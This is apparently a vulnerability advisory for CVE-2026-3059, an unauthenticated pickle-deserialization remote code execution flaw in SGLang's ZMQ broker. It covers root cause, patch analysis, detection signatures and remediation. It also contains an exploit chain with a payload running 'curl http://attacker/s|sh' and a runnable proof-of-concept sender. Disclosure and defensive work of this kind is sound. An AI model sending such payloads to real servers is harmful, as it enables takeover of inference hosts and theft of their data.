CVE-2026-3059: Unauthenticated RCE in SGLang via ZMQ Pickle Deserialization

SGLang's multimodal ZMQ broker deserializes attacker-controlled data via pickle.loads() with no authentication, enabling unauthenticated RCE against inference servers. CVSS 9.8.

// PLAIN ENGLISH VERSION

# A Critical Flaw in AI Software Lets Hackers Take Over Computers

SGLang is software that helps computers process images and generate responses — the kind of technology powering AI image analysis tools. Researchers have discovered a serious security hole that lets attackers take complete control of computers running this software.

Here's what's happening. The software uses a component called a ZMQ broker to handle requests. Think of it as a receptionist at a busy office: it accepts messages from different sources and routes them around. The problem is that this receptionist doesn't check anyone's ID. It trusts whatever message it receives and immediately processes it, no questions asked.

An attacker can exploit this by sending specially crafted malicious messages across the internet. These messages contain hidden instructions that give the hacker complete access to the targeted computer. Once in, they can steal data, install ransomware, or use the machine for further attacks.

Who's at risk? Mostly companies and researchers using SGLang to run AI applications — think tech companies, research institutions, and AI startups. If your organization uses this software in production, you could be vulnerable. The good news is there's no evidence of active attacks yet, but that could change quickly.

What should you do right now? First, check if your organization uses SGLang and whether it's exposed to the internet. Second, ask your IT team to apply the security update immediately; the developers have merged a fix (PR #20904). Third, if you can't patch right away, isolate SGLang systems from the internet until you can update. Don't wait on this one.


Vulnerability Overview

CVE-2026-3059 is a critical unauthenticated remote code execution vulnerability in SGLang, an open-source LLM serving framework widely deployed in production inference pipelines. The vulnerability exists in the multimodal generation module's inter-process communication layer, which uses ZeroMQ (ZMQ) as a message broker and pickle.loads() to deserialize incoming messages. Because the ZMQ socket binds to a network-accessible endpoint with no authentication, authorization, or message signing, any network-adjacent or remote attacker who can reach the broker port can execute arbitrary Python code in the context of the inference server process, which typically runs as root or a privileged service account on GPU compute nodes.

Root cause: SGLang's ZMQ broker calls pickle.loads() on raw bytes received from an unauthenticated network socket, allowing an attacker to deliver a malicious pickle payload that executes arbitrary OS commands during deserialization.

Affected Component

The vulnerable code lives in SGLang's multimodal tokenizer/detokenizer worker infrastructure. The relevant files are:

python/sglang/srt/managers/image_processor.py — binds the ZMQ PULL socket and calls pickle.loads()
python/sglang/srt/managers/tokenizer_manager.py — counterpart PUSH side; same pattern
python/sglang/srt/server.py — launches broker workers as subprocesses, inheriting the open socket

The ZMQ broker is instantiated on a tcp:// transport by default in multi-node and disaggregated prefill configurations, making it reachable over the network rather than solely via Unix domain socket.

Root Cause Analysis

The core issue is a textbook unsafe deserialization pattern. The image processor worker loop receives raw ZMQ frames and unconditionally deserializes them:


# python/sglang/srt/managers/image_processor.py
# BUG: recv_pyobj() calls pickle.loads() on the raw frame bytes with no
#      authentication, signature verification, or type allowlisting.

class ImageProcessorWorker:
    def __init__(self, zmq_context, port):
        self.socket = zmq_context.socket(zmq.PULL)
        # BUG: binds to all interfaces on an attacker-reachable port
        self.socket.bind(f"tcp://0.0.0.0:{port}")

    def event_loop(self):
        while True:
            # recv_pyobj() is a thin wrapper around pickle.loads(self.socket.recv())
            # BUG: no HMAC, no allowlist, no type check before deserialization
            obj = self.socket.recv_pyobj()   # <-- arbitrary code execution here
            self._process(obj)

pyzmq's recv_pyobj() is documented as a convenience wrapper that calls pickle.loads() internally. An attacker defines a class whose __reduce__ method returns (os.system, ("cmd",)) or equivalent; pickle.dumps() calls __reduce__ on the attacker's machine and encodes that callable and argument tuple into the stream. On the receiving side, the unpickler's REDUCE opcode calls the named callable with those arguments unconditionally, achieving OS command execution before any application-level validation occurs.
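To make the mechanism concrete, here is a minimal and deliberately benign sketch. The class name Demo is hypothetical, and int() stands in for whatever callable an attacker would choose. It illustrates that the receiver never reconstructs the sender's object; it simply calls the callable named in the stream:

```python
import pickle

class Demo:
    """Hypothetical class; int() stands in for an attacker-chosen callable."""
    def __reduce__(self):
        # Called by pickle.dumps() on the sending side. The returned
        # (callable, args) pair is what gets encoded into the stream.
        return (int, ("42",))

data = pickle.dumps(Demo())

# The receiver never sees a Demo instance: the unpickler's REDUCE opcode
# calls int("42") and hands back whatever that call produces.
result = pickle.loads(data)
print(type(result).__name__, result)
```

Swapping int for os.system is the only change needed to turn this into command execution, which is why no validation applied to the returned object can help.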

The equivalent C-level call path inside CPython's pickle machinery:


/* Modules/_pickle.c — simplified pseudocode of the dangerous path */
static int
load_reduce(UnpicklerObject *self)
{
    PyObject *callable = NULL;
    PyObject *argtuple  = NULL;

    /* pops callable and args from the internal stack */
    PDATA_POP(self->stack, argtuple);
    PDATA_POP(self->stack, callable);

    // BUG: callable is completely attacker-controlled at this point;
    //      no allowlist check before invocation
    PyObject *result = PyObject_Call(callable, argtuple, NULL);
    ...
}

Because load_reduce executes before the calling application sees the deserialized object, there is no opportunity for SGLang to inspect or reject the payload post-facto.

Exploitation Mechanics


EXPLOIT CHAIN — CVE-2026-3059:

1. Attacker identifies target SGLang inference server with multimodal support
   enabled (--enable-multimodal flag or disaggregated prefill config).

2. Port discovery: ZMQ broker port is either default (e.g., base_port+3) or
   leaked via SGLang's /health or /get_server_info HTTP endpoints which
   expose internal topology in some configurations.

3. Attacker constructs malicious pickle payload:
      class Exploit(object):
          def __reduce__(self):
              return (os.system, ("curl http://attacker/s|sh",))
      payload = pickle.dumps(Exploit())

4. Attacker sends payload directly to the ZMQ PULL socket from a
   zmq.PUSH socket; no credentials or application-level handshake required:
      ctx  = zmq.Context()
      sock = ctx.socket(zmq.PUSH)
      sock.connect(f"tcp://{target}:{broker_port}")
      sock.send(payload)   # triggers pickle.loads() on target

5. ImageProcessorWorker.event_loop() calls recv_pyobj() -> pickle.loads()
   -> load_reduce() -> PyObject_Call(os.system, ("curl ...|sh",))

6. OS command executes in the inference server process context, typically
   UID 0 inside a container or a high-privilege service account on bare metal.

7. Attacker lands reverse shell; GPU node is now fully compromised.
   Lateral movement to other cluster nodes via shared NFS/model weights
   store or Kubernetes service account token is straightforward.

A minimal proof-of-concept sender (disclosure-safe, no weaponized payload):


#!/usr/bin/env python3
# CVE-2026-3059 — PoC trigger (CypherByte research, no weaponized payload)
import zmq
import pickle
import os
import sys

TARGET  = sys.argv[1]          # e.g. "192.168.1.50"
PORT    = int(sys.argv[2])     # e.g. 30003

class _Probe:
    """Benign probe: writes a canary file to confirm deserialization."""
    def __reduce__(self):
        return (os.system, ("touch /tmp/CVE-2026-3059-pwned",))

ctx  = zmq.Context()
sock = ctx.socket(zmq.PUSH)
sock.connect(f"tcp://{TARGET}:{PORT}")
sock.send(pickle.dumps(_Probe()))
sock.close()
print("[*] payload sent — check /tmp/CVE-2026-3059-pwned on target")

Memory Layout

Because this is a deserialization RCE rather than a memory-corruption primitive, the "memory layout" of interest is the ZMQ frame wire format and the pickle opcode stream. The following shows the on-wire structure of the malicious message:


ZMQ FRAME STRUCTURE (PUSH/PULL, no envelope):
+--------+----------------------------------------------------+
| Offset | Content                                            |
+--------+----------------------------------------------------+
| 0x00   | ZMTP flags byte (MORE / LONG / COMMAND bits)       |
| 0x01   | Frame size: 1 byte, or 8 bytes if LONG is set      |
| +N     | Raw pickle stream (attacker-controlled bytes)      |
+--------+----------------------------------------------------+

PICKLE OPCODE STREAM FOR EXPLOIT PAYLOAD (simplified; MEMOIZE opcodes omitted):
Offset  Opcode    Operand
------  --------  ------------------------------------------
0x00    0x80 0x04 PROTO 4        (pickle protocol 4)
0x02    0x95      FRAME          (framing header)
0x03    [8 bytes] frame length
0x0b    0x8c      SHORT_BINUNICODE
0x0c    0x02      length = 2
0x0d    "os"      module name
0x0f    0x8c      SHORT_BINUNICODE
0x10    0x06      length = 6
0x11    "system"  callable name
0x17    0x93      STACK_GLOBAL   <- resolves os.system, pushes onto stack
0x18    0x8c      SHORT_BINUNICODE
0x19    [len]     length of command string
0x1a    "curl http://attacker/s|sh"   <- attacker command
0x??    0x85      TUPLE1         <- pack command into 1-tuple
0x??    0x52      REDUCE         <- calls os.system(cmd) HERE
0x??    0x2e      STOP

No heap grooming, no ASLR bypass, no ROP chain required. The exploit is entirely logic-based: pickle's REDUCE opcode is the primitive, and Python's import system is the gadget chain.
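The opcode stream can be inspected without executing it. The following sketch uses the standard library's pickletools.genops() to list the opcodes that import a global or invoke a callable; the RISKY set and the helper name are illustrative choices rather than an established detection rule, and the sample object is benign:

```python
import pickle
import pickletools

# Opcodes that import a global or invoke a callable during unpickling.
RISKY = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE"}

def risky_opcodes(data: bytes):
    """Return (offset, opcode name) pairs without executing the stream."""
    return [(pos, op.name) for op, _arg, pos in pickletools.genops(data)
            if op.name in RISKY]

class _Sample:
    """Hypothetical benign object: unpickling it would just call len('abc')."""
    def __reduce__(self):
        return (len, ("abc",))

plain = risky_opcodes(pickle.dumps({"a": 1}, protocol=4))
callable_stream = risky_opcodes(pickle.dumps(_Sample(), protocol=4))
print(plain)
print([name for _pos, name in callable_stream])
```

Ordinary pickled class instances also use these opcodes, so a hit means "this stream can call code", not "this stream is malicious".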

Patch Analysis

The fix, landed in PR #20904, replaces recv_pyobj() / send_pyobj() calls with a safer serialization scheme. The patch has three components:

1. Replace pickle with msgpack or JSON for IPC messages:


# BEFORE (vulnerable) — python/sglang/srt/managers/image_processor.py:
obj = self.socket.recv_pyobj()   # calls pickle.loads() internally

# AFTER (patched, PR #20904):
raw = self.socket.recv()
obj = msgpack.unpackb(raw, raw=False, strict_map_key=False)
# Only known message types are constructed; no arbitrary code execution path

2. Bind ZMQ sockets to loopback when multi-node transport is not required:


# BEFORE:
self.socket.bind(f"tcp://0.0.0.0:{port}")

# AFTER (patched):
bind_addr = "127.0.0.1" if not config.enable_disaggregated_prefill else "0.0.0.0"
self.socket.bind(f"tcp://{bind_addr}:{port}")
# NOTE: disaggregated prefill still requires network binding — see remediation

3. HMAC authentication for network-facing sockets (defense-in-depth):


# AFTER (patched), added HMAC verification layer:
import hmac, hashlib, secrets

import msgpack   # third-party serializer, same one used in component 1

BROKER_SECRET = secrets.token_bytes(32)   # generated at server startup

class SecurityError(Exception):
    """Defined here so the snippet is self-contained; raised on a bad MAC."""

def _send_authenticated(sock, obj):
    payload = msgpack.packb(obj)
    mac     = hmac.new(BROKER_SECRET, payload, hashlib.sha256).digest()
    sock.send_multipart([mac, payload])

def _recv_authenticated(sock):
    mac, payload = sock.recv_multipart()
    expected     = hmac.new(BROKER_SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):   # constant-time compare
        raise SecurityError("ZMQ broker: MAC verification failed")
    return msgpack.unpackb(payload)
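The comment in component 1, "Only known message types are constructed", can be sketched as follows. This is an assumption-laden illustration, not the patch: it uses the standard library's json instead of msgpack so it runs without extra dependencies, and ImageRequest, MESSAGE_TYPES, and the wire layout ("type" plus "fields") are all hypothetical:

```python
import json
from dataclasses import dataclass

@dataclass(frozen=True)
class ImageRequest:
    """Hypothetical message type; field names are illustrative only."""
    request_id: str
    image_url: str

# Hypothetical registry: wire "type" tag -> constructor for a known message.
MESSAGE_TYPES = {"image_request": ImageRequest}

def decode_message(raw: bytes):
    doc = json.loads(raw)   # yields only dict/list/str/number/bool/None
    if not isinstance(doc, dict):
        raise ValueError("message must be a JSON object")
    tag = doc.get("type")
    cls = MESSAGE_TYPES.get(tag) if isinstance(tag, str) else None
    if cls is None:
        raise ValueError(f"unknown message type: {tag!r}")
    fields = doc.get("fields")
    if not isinstance(fields, dict) or not all(
        isinstance(value, str) for value in fields.values()
    ):
        raise ValueError("fields must be an object of strings")
    return cls(**fields)    # TypeError on missing or unexpected fields

wire = json.dumps(
    {"type": "image_request",
     "fields": {"request_id": "r1", "image_url": "http://example.invalid/a.png"}}
).encode()
print(decode_message(wire))
```

The design point is that the decoder can only ever produce plain data, and the receiver, not the sender, decides which constructors may be called.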

Detection and Indicators

Because exploitation leaves minimal OS-level traces until post-exploitation, detection must focus on the network and process layers:


NETWORK INDICATORS:
- Unexpected TCP connections to SGLang ZMQ broker ports (default range:
  base_port+2 through base_port+5, commonly 30002-30005)
- ZMQ PUSH connections originating from hosts not in the serving cluster
- Outbound connections from inference worker PIDs to unknown hosts
  (reverse shell establishment)

PROCESS INDICATORS:
- Child processes spawned by python3/uvicorn workers: sh, bash, curl, wget
  as direct children of SGLang worker PIDs
- /tmp/pip-*, /tmp/*.sh files created by inference server UID

LINUX AUDITD RULES:
-a always,exit -F arch=b64 -S execve \
   -F ppid=$(pgrep -f image_processor) \
   -k sglang_rce_child_exec

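SNORT/SURICATA SIGNATURE (pickle REDUCE opcode on ZMQ port):
# Matches PROTO 4 + FRAME, then STACK_GLOBAL (0x93), then REDUCE (0x52).
# The pickle header is not anchored at offset 0 because the ZMTP greeting
# and frame header precede it in the TCP stream.
alert tcp any any -> $SGLANG_HOSTS 30000:30010 ( \
    msg:"CVE-2026-3059 pickle REDUCE opcode on ZMQ broker port"; \
    flow:to_server,established; \
    content:"|80 04 95|"; \
    content:"|93|"; distance:0; \
    content:"|52|"; distance:0; \
    sid:2026305901; rev:1; \
)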

Remediation

Immediate mitigations (if patch cannot be applied yet):

Firewall ZMQ broker ports at the host and network level. These ports must only be reachable from trusted cluster nodes. Use iptables -A INPUT -p tcp --dport 30000:30010 ! -s <trusted_cidr> -j DROP as a stopgap.
If running in Kubernetes, enforce NetworkPolicy to restrict pod-to-pod communication to known SGLang topology peers only.
Disable multimodal support (--disable-multimodal) if not required — this removes the vulnerable worker process entirely.
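To check whether a Linux host currently exposes anything in that port range, the listening-socket table can be read directly. The sketch below parses text in the /proc/net/tcp format; the function name is hypothetical, the 30000-30010 range is taken from the firewall rule above, and it covers IPv4 only and assumes a little-endian host:

```python
import socket

def exposed_listeners(proc_net_tcp: str, lo: int = 30000, hi: int = 30010):
    """Return (ip, port) for LISTEN sockets in [lo, hi] not bound to loopback."""
    found = []
    for line in proc_net_tcp.splitlines()[1:]:      # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[3] != "0A":    # 0A is the LISTEN state
            continue
        ip_hex, port_hex = fields[1].split(":")
        port = int(port_hex, 16)
        # Assumes a little-endian host (x86-64, aarch64): reverse the bytes.
        ip = socket.inet_ntoa(bytes.fromhex(ip_hex)[::-1])
        if lo <= port <= hi and not ip.startswith("127."):
            found.append((ip, port))
    return found

# Two sample rows: 0.0.0.0:30003 (exposed) and 127.0.0.1:30004 (loopback).
SAMPLE = (
    "  sl  local_address rem_address   st\n"
    "   0: 00000000:7533 00000000:0000 0A\n"
    "   1: 0100007F:7534 00000000:0000 0A\n"
)
print(exposed_listeners(SAMPLE))
```

On a live host the input would come from reading /proc/net/tcp; any result other than an empty list means a broker-range port is bound to a non-loopback address.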

Permanent fix: Upgrade to the patched SGLang release that incorporates PR #20904. Verify the fix is present by confirming recv_pyobj() and send_pyobj() do not appear in image_processor.py or tokenizer_manager.py:


$ grep -rn "recv_pyobj\|send_pyobj\|pickle.loads" \
    python/sglang/srt/managers/
# Should produce zero output on patched versions

For disaggregated prefill deployments where the ZMQ socket must bind to a network interface, the patched HMAC layer is the primary control. Ensure BROKER_SECRET is distributed only to trusted peers via a secrets manager (Vault, K8s Secret with restricted RBAC) and never embedded in environment variables visible to untrusted workloads.